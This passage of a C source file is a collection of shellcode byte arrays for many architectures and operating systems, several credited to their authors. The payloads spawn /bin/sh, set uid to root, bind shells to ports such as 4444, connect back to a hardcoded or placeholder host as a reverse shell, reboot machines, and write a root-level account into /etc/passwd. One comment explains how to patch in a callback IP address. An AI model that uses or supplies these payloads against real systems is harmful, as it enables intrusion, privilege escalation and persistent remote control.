"\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\x32\xE2\xE2\xE2\x70\x75\x75\x33"
"\x78\x65\x78\x1D";
#if 0
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb\x61\xd9"\
"\xe7\x77\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\x32"\
"\xb3\xe7\x77\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x03\x31\xd2\x52\x51"\
"\x51\x52\xff\xd0\x31\xd2\x50\xb8\xfd\x98\xe7\x77\xff\xd0\xe8\xc4\xff"\
"\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff"\
"\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff"\
"\xff\x48\x65\x79\x4e";
#endif
unsigned char x86_w32_adduser[] =
"\x31\xc9\x83\xe9\xce\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8"
"\x5e\x22\xde\x83\xeb\xfc\xe2\xf4\x14\xb6\x66\xde\xe8\x5e\xa9\x9b"
"\xd4\xd5\x5e\xdb\x90\x5f\xcd\x55\xa7\x46\xa9\x81\xc8\x5f\xc9\x97"
"\x63\x6a\xa9\xdf\x06\x6f\xe2\x47\x44\xda\xe2\xaa\xef\x9f\xe8\xd3"
"\xe9\x9c\xc9\x2a\xd3\x0a\x06\xda\x9d\xbb\xa9\x81\xcc\x5f\xc9\xb8"
"\x63\x52\x69\x55\xb7\x42\x23\x35\x63\x42\xa9\xdf\x03\xd7\x7e\xfa"
"\xec\x9d\x13\x1e\x8c\xd5\x62\xee\x6d\x9e\x5a\xd2\x63\x1e\x2e\x55"
"\x98\x42\x8f\x55\x80\x56\xc9\xd7\x63\xde\x92\xde\xe8\x5e\xa9\xb6"
"\xd4\x01\x13\x28\x88\x08\xab\x26\x6b\x9e\x59\x8e\x80\xae\xa8\xda"
"\xb7\x36\xba\x20\x62\x50\x75\x21\x0f\x3d\x4f\xba\xc6\x3b\x5a\xbb"
"\xc8\x71\x41\xfe\x86\x3b\x56\xfe\x9d\x2d\x47\xac\xc8\x27\x02\xa6"
"\xc8\x71\x63\x9a\xac\x7e\x04\xf8\xc8\x30\x47\xaa\xc8\x32\x4d\xbd"
"\x89\x32\x45\xac\x87\x2b\x52\xfe\xa9\x3a\x4f\xb7\x86\x37\x51\xaa"
"\x9a\x3f\x56\xb1\x9a\x2d\x02\xa7\xc8\x71\x63\x9a\xac\x5e\x22\xde";
/*
"\x33\xc9\x83\xe9\xce\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08"
"\x99\xc6\xb8\x83\xeb\xfc\xe2\xf4\xf4\x71\x82\xb8\x08\x99\x4d\xfd"
"\x34\x12\xba\xbd\x70\x98\x29\x33\x47\x81\x4d\xe7\x28\x98\x2d\xf1"
"\x83\xad\x4d\xb9\xe6\xa8\x06\x21\xa4\x1d\x06\xcc\x0f\x58\x0c\xb5"
"\x09\x5b\x2d\x4c\x33\xcd\xe2\xbc\x7d\x7c\x4d\xe7\x2c\x98\x2d\xde"
"\x83\x95\x8d\x33\x57\x85\xc7\x53\x83\x85\x4d\xb9\xe3\x10\x9a\x9c"
"\x0c\x5a\xf7\x78\x6c\x12\x86\x88\x8d\x59\xbe\xb4\x83\xd9\xca\x33"
"\x78\x85\x6b\x33\x60\x91\x2d\xb1\x83\x19\x76\xb8\x08\x99\x4d\xd0"
"\x34\xc6\xf7\x4e\x68\xcf\x4f\x40\x8b\x59\xbd\xe8\x60\x69\x4c\xbc"
"\x57\xf1\x5e\x46\x82\x97\x91\x47\xef\xfa\xab\xdc\x26\xfc\xbe\xdd"
"\x28\xb6\xa5\x98\x66\xfc\xb2\x98\x7d\xea\xa3\xca\x28\xe1\xe6\xc1"
"\x28\xb6\x87\xfc\x4c\xb9\xe0\x9e\x28\xf7\xa3\xcc\x28\xf5\xa9\xdb"
"\x69\xf5\xa1\xca\x67\xec\xb6\x98\x49\xfd\xab\xd1\x66\xf0\xb5\xcc"
"\x7a\xf8\xb2\xd7\x7a\xea\xe6\xc0\x28\xb6\x87\xfc\x4c\x99\xc6\xb8";
*/
unsigned char x86_w32_cmd_exit[] =
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa8"
"\x2a\x6e\x63\x83\xeb\xfc\xe2\xf4\x54\xc2\x2a\x63\xa8\x2a\xe5\x26"
"\x94\xa1\x12\x66\xd0\x2b\x81\xe8\xe7\x32\xe5\x3c\x88\x2b\x85\x2a"
"\x23\x1e\xe5\x62\x46\x1b\xae\xfa\x04\xae\xae\x17\xaf\xeb\xa4\x6e"
"\xa9\xe8\x85\x97\x93\x7e\x4a\x67\xdd\xcf\xe5\x3c\x8c\x2b\x85\x05"
"\x23\x26\x25\xe8\xf7\x36\x6f\x88\x23\x36\xe5\x62\x43\xa3\x32\x47"
"\xac\xe9\x5f\xa3\xcc\xa1\x2e\x53\x2d\xea\x16\x6f\x23\x6a\x62\xe8"
"\xd8\x36\xc3\xe8\xc0\x22\x85\x6a\x23\xaa\xde\x63\xa8\x2a\xe5\x0b"
"\x94\x75\x5f\x95\xc8\x7c\xe7\x9b\x2b\xea\x15\x33\xc0\xc5\xa0\x83"
"\xc8\x42\xf6\x9d\x22\x24\x39\x9c\x4f\x49\x03\x07\x86\x4f\x16\x06"
"\xa8\x2a\x6e\x63";
unsigned char sparc_linux_bind4444[] =
"\x23\x2d\x57\xbb\xa2\x14\x63\xd5\x20\xbf\xff\xff\x20\xbf\xff\xff"
"\x7f\xff\xff\xff\xea\x03\xe0\x20\xaa\x9d\x40\x11\xea\x23\xe0\x20"
"\xa2\x04\x40\x15\x81\xdb\xe0\x20\x12\xbf\xff\xfb\x9e\x03\xe0\x04"
"\x29\x75\x4f\xd2\xf1\x9a\xaf\xde\x61\x8a\x8f\xdf\x61\x89\x70\x2b"
"\xb1\xed\x30\x2b\xf1\xd1\xf0\x37\x60\x35\xaf\xcb\x06\x29\x8f\x1d"
"\x97\x99\xf0\xb1\x3c\x3a\x50\x91\x9a\x2d\xb0\xc1\x32\x6e\x0f\x15"
"\x54\x4a\xcf\x2d\xb1\xad\x30\x49\x69\xb8\x10\x0d\xc3\xdf\x12\xb8"
"\xfb\xe4\x2d\x22\x6c\x0b\x72\xa0\x1d\xfb\x52\xb4\xbf\xeb\xb2\xb5"
"\x22\x28\x0d\x4d\x32\x3f\x52\xa9\xa3\xef\xb2\xa1\x04\x2c\x0d\x39"
"\x44\x10\xcd\x45\xd4\x47\x12\xb0\x45\xb7\x72\xaa\xb6\x14\xcd\x3e"
"\xa4\x4b\x12\xbd\x5a\xc9\x32\xc0\xd9\x1d\x92\x98\x4c\xcd\xf3\x0c"
"\x7c\x52\x0c\xd1\x51\xae\x4c\xdd\xc5\xab\x73\x16\xc4\xc7\xab\xb2"
"\xa6\xcc\x6a\xac\x85\xe7\xb1\xea\x59\xdb\xea\x1a\xc8\x38\x4a\x12"
"\x0c\x04\x35\xd2\x1c\x58\xf5\xea\x5c\xbc\xb5\xf6\xde\xd2\xea\x3d"
"\x4f\x02\xca\x49\x70\xa3\x0a\x49";
unsigned char x86_bsd_suidsh[] =
"\x31\xc0\x50\x50\xb0\x17\xcd\x80" // setuid
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80";
unsigned char x86_netbsd_binsh[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
unsigned char x86_osx_binsh[] =
"\x31\xdb\x6a\x3b\x58\x53\xeb\x18\x5f"
"\x57\x53\x54\x54\x57\x6a\xff\x88\x5f"
"\x07\x89\x5f\xf5\x88\x5f\xfa\x9a\xff"
"\xff\xff\xff\x2b\xff\xe8\xe3\xff\xff"
"\xff/bin/shX";
unsigned char x86_osx_binsh2[] =
"\x99\x52\x68\x2f\x2f\x73\x68\x68"
"\x2f\x62\x69\x6e\x89\xe3\x52\x54"
"\x54\x53\x53\x8d\x42\x3b\xcd\x80";
unsigned char x86_osx_bind4444[] =
"\x33\xc9\x83\xe9\xea\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc5"
"\x7e\x85\xb4\x83\xeb\xfc\xe2\xf4\xaf\x3c\xdd\x79\x45\x14\xe4\xec"
"\x5c\x2c\xed\xa4\xc7\x6f\xd9\x3d\x24\x2c\xc7\xe6\x87\x2c\xef\xa4"
"\x08\xfe\x1c\x27\x94\x2d\xd7\xde\xad\x26\x48\x34\x75\x14\x48\x34"
"\x97\x2d\xd7\x04\xdb\xb3\x05\x23\xaf\x7c\xdc\xde\x9f\x26\xd4\xe3"
"\x94\xb3\x05\xfd\xca\xf7\x74\x4b\x3a\x81\xd5\xdc\xea\x51\xf6\xdc"
"\xad\x51\xe7\xdd\xab\xf7\x66\xe4\x91\x2a\xd6\xe7\x75\x45\x48\x34";
char x86_linux_binsh3[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
"\xd7\xff\xff\xff/bin/sh";
unsigned char x86_solaris_bind4444[] =
"\x31\xc9\x83\xe9\xe8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3f"
"\x08\x0b\x8d\x83\xeb\xfc\xe2\xf4\x87\xf7\xf3\x72\x03\xff\xdb\xdd"
"\x0e\xc8\xbb\x17\x6f\x81\xee\xbc\xf6\x59\x4a\xcc\x6e\x59\xbb\x6b"
"\xc0\xdd\x3a\x5f\xb6\xcf\x59\xeb\x57\x19\x57\xeb\x6e\x81\xed\xe7"
"\x2f\x5e\x5c\x3d\xd7\xf7\xde\x3d\xd6\xf7\xde\xdd\x6f\x5f\xbb\x67"
"\xc0\xdd\x3a\x5f\x8d\x01\x5a\xdf\x6f\xb8\x35\x72\xea\x41\x72\x7f"
"\x6f\x60\x24\xa2\x4c\x60\x63\xa2\x5d\x61\x65\x04\xdc\x58\x58\x04"
"\xdd\x58\x59\xde\x8f\x33\xf4\x58";
char *arm_linux_thumb="\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x0c\x30\xc0\x46\x01\x90"
"\x49\x1a\x92\x1a\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68";
char arm_linux_binsh[]= "\x02\x20\x42\xe0\x1c\x30\x8f\xe2\x04\x30\x8d\xe5"
"\x08\x20\x8d\xe5\x13\x02\xa0\xe1\x07\x20\xc3\xe5\x04\x30\x8f\xe2"
"\x04\x10\x8d\xe2\x01\x20\xc3\xe5\x0b\x0b\x90\xef/bin/sh";
char arm_linux_suidsh[]=
"\x02\x20\x42\xe0\x04\x10\x8f\xe2\x12\x02\xa0\xe1\x01\x20\xc1\xe5\x17\x0b\x90\xef"
"\x02\x20\x42\xe0\x1c\x30\x8f\xe2\x04\x30\x8d\xe5" // shellcode
"\x08\x20\x8d\xe5\x13\x02\xa0\xe1\x07\x20\xc3\xe5\x04\x30\x8f\xe2"
"\x04\x10\x8d\xe2\x01\x20\xc3\xe5\x0b\x0b\x90\xef/bin/sh";
char x86_openbsd_binsh[] =
"\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x54"
"\x53\x53\x6a\x3b\x58\xcd\x80";
long x86_openbsd_bind6969[]= {
0x4151c931,0x51514151,0x61b0c031,0x078980cd,0x4f88c931,0x0547c604,0x084f8902,
0x0647c766,0x106a391b,0x5004478d,0x5050078b,0x68b0c031,0x016a80cd,0x5050078b,
0x6ab0c031,0xc93180cd,0x078b5151,0xc0315050,0x80cd1eb0,0xc9310789,0x50078b51,
0xb0c03150,0x4180cd5a,0x7503f983,0x5b23ebef,0xc9311f89,0x89074b88,0x8d51044f,
0x078b5007,0xc0315050,0x80cd3bb0,0x5151c931,0x01b0c031,0xd8e880cd,0x2fffffff,
0x2f6e6962,0x90416873 };
unsigned char arm_linux_setuid[]=
"\x02\x20\x42\xe0\x04\x10\x8f\xe2\x12\x02\xa0\xe1\x01\x20\xc1\xe5\x17\x0b\x90\xef";
unsigned long armle_osx_reverse[]= {
0xe3a00002, 0xe3a01001, 0xe3a02006, 0xe3a0c061, 0xef000080, 0xe1a0a000, 0xeb000001,
0x5c110200, //# port 4444
0x8700a8c0, //# host 192.168.0.135
0xe1a0000a, 0xe1a0100e, 0xe3a02010, 0xe3a0c062, 0xef000080,
0xe3a05002, 0xe3a0c05a, 0xe1a0000a, 0xe1a01005, 0xef000080,
0xe2455001, 0xe3550000, 0xaafffff8, 0xe3a00000, 0xe3a01001,
0xe3a0c07e, 0xef000080, 0xe0455005, 0xe1a0600d, 0xe24dd020,
0xe28f0014, 0xe4860000, 0xe5865004, 0xe1a01006, 0xe3a02000,
0xe3a0c03b, 0xef000080,
//# /bin/sh
0x6e69622f, 0x0068732f };
unsigned char x64_linux_binsh[] =
"\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53"
"\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b"
"\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05";
unsigned char x86_freebsd_reboot[] = "\x31\xc0\x50\xb0\x37\xcd\x80";
unsigned char x86_freebsd_reverse[] =
"\xeb\x68\x5e\x31\xc0\x31\xdb\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x53\xb0\x61"
"\xcd\x80\x89\xc2\xc6\x46\x01\x02\x66\xc7\x46\x02\x69\x7a\xb3\x10\x53\x8d\x1e"
"\x53\x50\x50\xb0\x62\xcd\x80\x31\xdb\x53\x52\xb0\x5a\x50\xcd\x80\xfe\xc3\x53"
"\x52\xb0\x5a\x50\xcd\x80\xfe\xc3\x53\x52\xb0\x5a\x50\xcd\x80\x31\xdb\x53\x8d"
"\x7e\x0f\x31\xc0\x31\xc9\xb1\x09\xf3\xaa\x8d\x5e\x08\x89\x5e\x10\x8d\x4e\x10"
"\x51\x53\x50\xb0\x3b\xcd\x80\xb0\x01\xcd\x80\xe8\x93\xff\xff\xff\x41\x42\x43"
"\x43\x7f\x00\x00\x01\x2f\x62\x69\x6e\x2f\x73\x68";
unsigned char x86_bsdlinux_binsh[] = // by dymitrii
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50"
"\x8c\xe0\x21\xc0\x74\x04\xb0\x3b\xeb\x07\xb0\x0b\x99\x52\x53\x89\xe1\xcd\x80";
char x86_solaris_binsh[] =
"\xeb\x33\x5e\x8d\x06\x29\xc9\x89\xf3\x89\x5e\x08\xb1\x07\x80\x03\x20"
"\x43"
"\xe0\xfa"
"\x93"
"\x29\xc0"
"\x89\x5e\x0b"
"\x29\xd2"
"\x88\x56\x19"
"\x89\x56\x07"
"\x89\x56\x0f"
"\x89\x56\x14"
"\xb0\x3b"
"\x8d\x4e\x0b"
"\x89\xca"
"\x52"
"\x51"
"\x53"
"\x50"
"\xeb\x18"
"\xe8\xc8\xff\xff\xff"
"\x0f\x42\x49\x4e\x0f\x53\x48"
"\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03"
"\x9a\x04\x04\x04\x04\x07\x04";
unsigned char x86_solaris_binshu[] =
"\xeb\x33\x5e\x8d\x06\x29\xc9\x89\xf3\x89\x5e\x08\xb1\x07\x80\x03\x20\x43\xe0\xfa"
"\x93\x29\xc0\x89\x5e\x0b\x29\xd2\x88\x56\x19\x89\x56\x07\x89\x56\x0f\x89\x56\x14"
"\xb0\x3b\x8d\x4e\x0b\x89\xca\x52\x51\x53\x50\xeb\x18\xe8\xc8\xff\xff\xff"
"\x0f\x42\x49\x4e\x0f\x53\x48" /* /bin/sh -= 0x20 */
"\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
unsigned char ppc_osx_binsh0[] =
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7d\x68\x02\xa6\x3b\xeb\x01\x71\x39\x40\x01\x71"
"\x39\x1f\xfe\xce\x7c\xa8\x29\xae\x38\x7f\xfe\xc7\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x38\x81\xff\xf8\x38\x0a\xfe\xca\x44\xff\xff\x02\x60\x60\x60\x60\x38\x0a\xfe\x90"
"\x44\xff\xff\x02\x2f\x62\x69\x6e\x2f\x73\x68\x54";
unsigned char ppc_osx_reboot[] =
"\x7c\x63\x1a\x79\x39\x40\x01\x70\x38\x0a\xfe\xb4\x44\xff\xff\x02\x60\x60\x60\x60"
"\x38\x0a\xfe\xc7\x44\xff\xff\x02";
unsigned char ppc_osx_adduser[] =
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7d\x48\x02\xa6\x3b\xea\x01\x70"
"\x39\x60\x01\x70\x39\x1f\xff\x0d\x7c\xa8\x29\xae\x38\x7f\xff\x04"
"\x38\x80\x02\x01\x38\xa0\xff\xff\x38\x0b\xfe\x95\x44\xff\xff\x02"
"\x60\x60\x60\x60\x38\x9f\xff\x0e\x38\xab\xfe\xe5\x38\x0b\xfe\x94"
"\x44\xff\xff\x02\x60\x60\x60\x60\x38\x0b\xfe\x96\x44\xff\xff\x02"
"\x60\x60\x60\x60\x7c\xa5\x2a\x79\x38\x7f\xff\x04\x90\x61\xff\xf8"
"\x90\xa1\xff\xfc\x38\x81\xff\xf8\x38\x0b\xfe\xcb\x44\xff\xff\x02"
"\x60\x60\x60\x60\x38\x0b\xfe\x91\x44\xff\xff\x02\x2f\x74\x6d\x70"
"\x2f\x78\x2e\x73\x68\x58\x23\x21\x2f\x62\x69\x6e\x2f\x73\x68\x0a"
"\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x27\x72\x30\x30\x74\x3a"
"\x3a\x39\x39\x39\x3a\x38\x30\x3a\x3a\x30\x3a\x30\x3a\x72\x30\x30"
"\x74\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x27\x20\x7c\x20\x2f"
"\x75\x73\x72\x2f\x62\x69\x6e\x2f\x6e\x69\x6c\x6f\x61\x64\x20\x2d"
"\x6d\x20\x70\x61\x73\x73\x77\x64\x20\x2e\x0a";
long ppc_bsd_binsh[] = { /* Palante's BSD PPC shellcode w/ NULL*/
0x7CC63278, 0x2F867FFF, 0x41BC005C, 0x7C6802A6,
0xB0C3FFF9, 0xB0C3FFF1, 0x38867FF0, 0x38A67FF4,
0x38E67FF3, 0x7CA52278, 0x7CE72278, 0x7C853A14,
0x7CC419AE, 0x7C8429D6, 0x7C842214, 0x7C043A14,
0x7CE72850, 0x7C852A14, 0x7C63212E, 0x7C832214,
0x7CC5212E, 0x7CA52A78, 0x44FFFF02, 0x7CE03B78,
0x44FFFF02, 0x4BFFFFA9, 0x2F62696E, 0x2F73685A,
0xFFFFFFFF, 0xFFFFFFFF
};
/*
* 203 byte StrongARM/Linux bind() portshell shellcode
* funkysh
*/
char arm_linux_bind[] =
"\x20\x60\x8f\xe2" /* add r6, pc, #32 */
"\x07\x70\x47\xe0" /* sub r7, r7, r7 */
"\x01\x70\xc6\xe5" /* strb r7, [r6, #1] */
"\x01\x30\x87\xe2" /* add r3, r7, #1 */
"\x13\x07\xa0\xe1" /* mov r0, r3, lsl r7 */
"\x01\x20\x83\xe2" /* add r2, r3, #1 */
"\x07\x40\xa0\xe1" /* mov r4, r7 */
"\x0e\xe0\x4e\xe0" /* sub lr, lr, lr */
"\x1c\x40\x2d\xe9" /* stmfd sp!, {r2-r4, lr} */
"\x0d\x10\xa0\xe1" /* mov r1, sp */
"\x66\xff\x90\xef" /* swi 0x90ff66 (socket) */
"\x10\x57\xa0\xe1" /* mov r5, r0, lsl r7 */
"\x35\x70\xc6\xe5" /* strb r7, [r6, #53] */
"\x14\x20\xa0\xe3" /* mov r2, #20 */
"\x82\x28\xa9\xe1" /* mov r2, r2, lsl #17 */
"\x02\x20\x82\xe2" /* add r2, r2, #2 */
"\x14\x40\x2d\xe9" /* stmfd sp!, {r2,r4, lr} */
"\x10\x30\xa0\xe3" /* mov r3, #16 */
"\x0d\x20\xa0\xe1" /* mov r2, sp */
"\x0d\x40\x2d\xe9" /* stmfd sp!, {r0, r2, r3, lr} */
"\x02\x20\xa0\xe3" /* mov r2, #2 */
"\x12\x07\xa0\xe1" /* mov r0, r2, lsl r7 */
"\x0d\x10\xa0\xe1" /* mov r1, sp */
"\x66\xff\x90\xef" /* swi 0x90ff66 (bind) */
"\x45\x70\xc6\xe5" /* strb r7, [r6, #69] */
"\x02\x20\x82\xe2" /* add r2, r2, #2 */
"\x12\x07\xa0\xe1" /* mov r0, r2, lsl r7 */
"\x66\xff\x90\xef" /* swi 0x90ff66 (listen) */
"\x5d\x70\xc6\xe5" /* strb r7, [r6, #93] */
"\x01\x20\x82\xe2" /* add r2, r2, #1 */
"\x12\x07\xa0\xe1" /* mov r0, r2, lsl r7 */
"\x04\x70\x8d\xe5" /* str r7, [sp, #4] */
"\x08\x70\x8d\xe5" /* str r7, [sp, #8] */
"\x66\xff\x90\xef" /* swi 0x90ff66 (accept) */
"\x10\x57\xa0\xe1" /* mov r5, r0, lsl r7 */
"\x02\x10\xa0\xe3" /* mov r1, #2 */
"\x71\x70\xc6\xe5" /* strb r7, [r6, #113] */
"\x15\x07\xa0\xe1" /* mov r0, r5, lsl r7 <dup2> */
"\x3f\xff\x90\xef" /* swi 0x90ff3f (dup2) */
"\x01\x10\x51\xe2" /* subs r1, r1, #1 */
"\xfb\xff\xff\x5a" /* bpl <dup2> */
"\x99\x70\xc6\xe5" /* strb r7, [r6, #153] */
"\x14\x30\x8f\xe2" /* add r3, pc, #20 */
"\x04\x30\x8d\xe5" /* str r3, [sp, #4] */
"\x04\x10\x8d\xe2" /* add r1, sp, #4 */
"\x02\x20\x42\xe0" /* sub r2, r2, r2 */
"\x13\x02\xa0\xe1" /* mov r0, r3, lsl r2 */
"\x08\x20\x8d\xe5" /* str r2, [sp, #8] */
"\x0b\xff\x90\xef" /* swi 0x900ff0b (execve) */
"/bin/sh";
char x86_ppc_linux_binsh[] =
//
// These four bytes work out to the following instruction
// in ppc arch: "rlwnm r16,r28,r29,13,4", which will
// basically do nothing on osx/ppc.
//
// However on x86 architecture the four bytes are 3
// instructions:
//
// "push/nop/jmp"
//
// In this way, execution will be taken to the x86 shellcode
// on an x86 machine, and the ppc shellcode when running
// on a ppc architecture machine.
//
"\x5f\x90\xeb\x48"
"\x69\x69\x69\x69" /*nop*/
"\x69\x69\x69\x69" /*nop*/
"\x69\x69\x69\x69" /*nop*/
// linux/ppc execve /bin/sh by Charles Stevenson (core) <core@bokeoa.com>
"\x7c\x3f\x0b\x78" /*mr r31,r1 # optional instruction */
"\x7c\xa5\x2a\x79" /*xor. r5,r5,r5*/
"\x42\x40\xff\xf9" /*bdzl+ 10000454<main>*/
"\x7f\x08\x02\xa6" /*mflr r24*/
"\x3b\x18\x01\x34" /*addi r24,r24,308*/
"\x98\xb8\xfe\xfb" /*stb r5,-261(r24)*/
"\x38\x78\xfe\xf4" /*addi r3,r24,-268*/
"\x90\x61\xff\xf8" /*stw r3,-8(r1)*/
"\x38\x81\xff\xf8" /*addi r4,r1,-8*/
"\x90\xa1\xff\xfc" /*stw r5,-4(r1)*/
"\x3b\xc0\x01\x60" /*li r30,352*/
"\x7f\xc0\x2e\x70" /*srawi r0,r30,5*/
"\x44\xde\xad\xf2" /*.long 0x44deadf2*/
"/bin/shZ" // the last byte becomes NULL
// lnx_binsh4.c - v1 - 23 Byte /bin/sh sysenter Opcode Array Payload
// Copyright(c) 2005 c0ntex <c0ntex@open-security.org>
// Copyright(c) 2005 BaCkSpAcE <sinisa86@gmail.com>
"\x6a\x0b\x58\x99\x52\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x54"
"\x5b\x52\x53\x54\x59\x0f\x34";
char x86_ppc_osx_binsh[] =
//
// These four bytes work out to the following instruction
// in ppc arch: "rlwnm r16,r28,r29,13,4", which will
// basically do nothing on osx/ppc.
//
// However on x86 architecture the four bytes are 3
// instructions:
//
// "push/nop/jmp"
//
// In this way, execution will be taken to the x86 shellcode
// on an x86 machine, and the ppc shellcode when running
// on a ppc architecture machine.
//
"\x5f\x90\xeb\x48"
// ppc execve() code by b-r00t
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd"
"\x7d\x68\x02\xa6\x3b\xeb\x01\x70"
"\x39\x40\x01\x70\x39\x1f\xfe\xcf"
"\x7c\xa8\x29\xae\x38\x7f\xfe\xc8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x38\x81\xff\xf8\x38\x0a\xfe\xcb"
"\x44\xff\xff\x02\x7c\xa3\x2b\x78"
"\x38\x0a\xfe\x91\x44\xff\xff\x02"
"\x2f\x62\x69\x6e\x2f\x73\x68\x58"
// osx86 execve() code by nemo
"\x31\xdb\x6a\x3b\x58\x53\xeb\x18\x5f"
"\x57\x53\x54\x54\x57\x6a\xff\x88\x5f"
"\x07\x89\x5f\xf5\x88\x5f\xfa\x9a\xff"
"\xff\xff\xff\x2b\xff\xe8\xe3\xff\xff"
"\xff/bin/shX";
/* by Jonathan Salwan
* http://shell-storm.org/shellcode/files/shellcode-735.php
*/
char arm_linux_adduser[] =
/* Thumb mode */
"\x05\x50\x45\xe0" /* sub r5, r5, r5 */
"\x01\x50\x8f\xe2" /* add r5, pc, #1 */
"\x15\xff\x2f\xe1" /* bx r5 */
/* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND, 0644) = fd */
"\x78\x46" /* mov r0, pc */
"\x7C\x30" /* adds r0, #124 */
"\xff\x21" /* movs r1, #255 */
"\xff\x31" /* adds r1, #255 */
"\xff\x31" /* adds r1, #255 */
"\xff\x31" /* adds r1, #255 */
"\x45\x31" /* adds r1, #69 */
"\xdc\x22" /* movs r2, #220 */
"\xc8\x32" /* adds r2, #200 */
"\x05\x27" /* movs r7, #5 */
"\x01\xdf" /* svc 1 */
/* r8 = fd */
"\x80\x46" /* mov r8, r0 */
/* write(fd, "shell-storm:$1$KQYl/yru$PMt02zUTW"..., 72) */
"\x41\x46" /* mov r1, r8 */
"\x08\x1c" /* adds r0, r1, #0 */
"\x79\x46" /* mov r1, pc */
"\x18\x31" /* adds r1, #24 */
"\xc0\x46" /* nop (mov r8, r8) */
"\x48\x22" /* movs r2, #72 */
"\x04\x27" /* movs r7, #4 */
"\x01\xdf" /* svc 1 */
/* close(fd) */
"\x41\x46" /* mov r1, r8 */
"\x08\x1c" /* adds r0, r1, #0 */
"\x06\x27" /* movs r7, #6 */
"\x01\xdf" /* svc 1 */
/* exit(0) */
"\x1a\x49" /* subs r1, r1, r1 */
"\x08\x1c" /* adds r0, r1, #0 */
"\x01\x27" /* movs r7, #1 */
"\x01\xdf" /* svc 1 */
/* shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bash\n */
"\x73\x68\x65\x6c\x6c\x2d\x73\x74\x6f\x72"
"\x6d\x3a\x24\x31\x24\x4b\x51\x59\x6c\x2f"
"\x79\x72\x75\x24\x50\x4d\x74\x30\x32\x7a"
"\x55\x54\x57\x6d\x4d\x76\x50\x57\x63\x55"
"\x34\x6f\x51\x4c\x73\x2f\x3a\x30\x3a\x30"
"\x3a\x72\x6f\x6f\x74\x3a\x2f\x72\x6f\x6f"
"\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73"
"\x68\x0a"
/* /etc/passwd */
"\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
/* by Dustin Schultz
* http://shell-storm.org/shellcode/files/shellcode-736.php
*/
char x64_osx_suidsh[] =
"\x41\xb0\x02\x49\xc1\xe0\x18\x49\x83\xc8\x17\x31\xff\x4c\x89\xc0"
"\x0f\x05\xeb\x12\x5f\x49\x83\xc0\x24\x4c\x89\xc0\x48\x31\xd2\x52"
"\x57\x48\x89\xe6\x0f\x05\xe8\xe9\xff\xff\xff\x2f\x62\x69\x6e\x2f"
"\x2f\x73\x68";
/* OSX reverse tcp shell (131 bytes)
* replace FFFFFFFF around byte 43 with the call back ip in hex
* replace 5C11 around byte 39 with a new port current is 4444
* http://hammackj.com/2011/04/28/osx-x64-reverse-tcp-shellcode/
*/
char x64_osx_reverse_tcp[] =
"\x41\xB0\x02\x49\xC1\xE0\x18\x49\x83\xC8\x61\x4C\x89\xC0\x48"
"\x31\xD2\x48\x89\xD6\x48\xFF\xC6\x48\x89\xF7\x48\xFF\xC7\x0F"
"\x05\x49\x89\xC4\x49\xBD\x01\x01\x11\x5C\xFF\xFF\xFF\xFF\x41"
"\xB1\xFF\x4D\x29\xCD\x41\x55\x49\x89\xE5\x49\xFF\xC0\x4C\x89"
"\xC0\x4C\x89\xE7\x4C\x89\xEE\x48\x83\xC2\x10\x0F\x05\x49\x83"
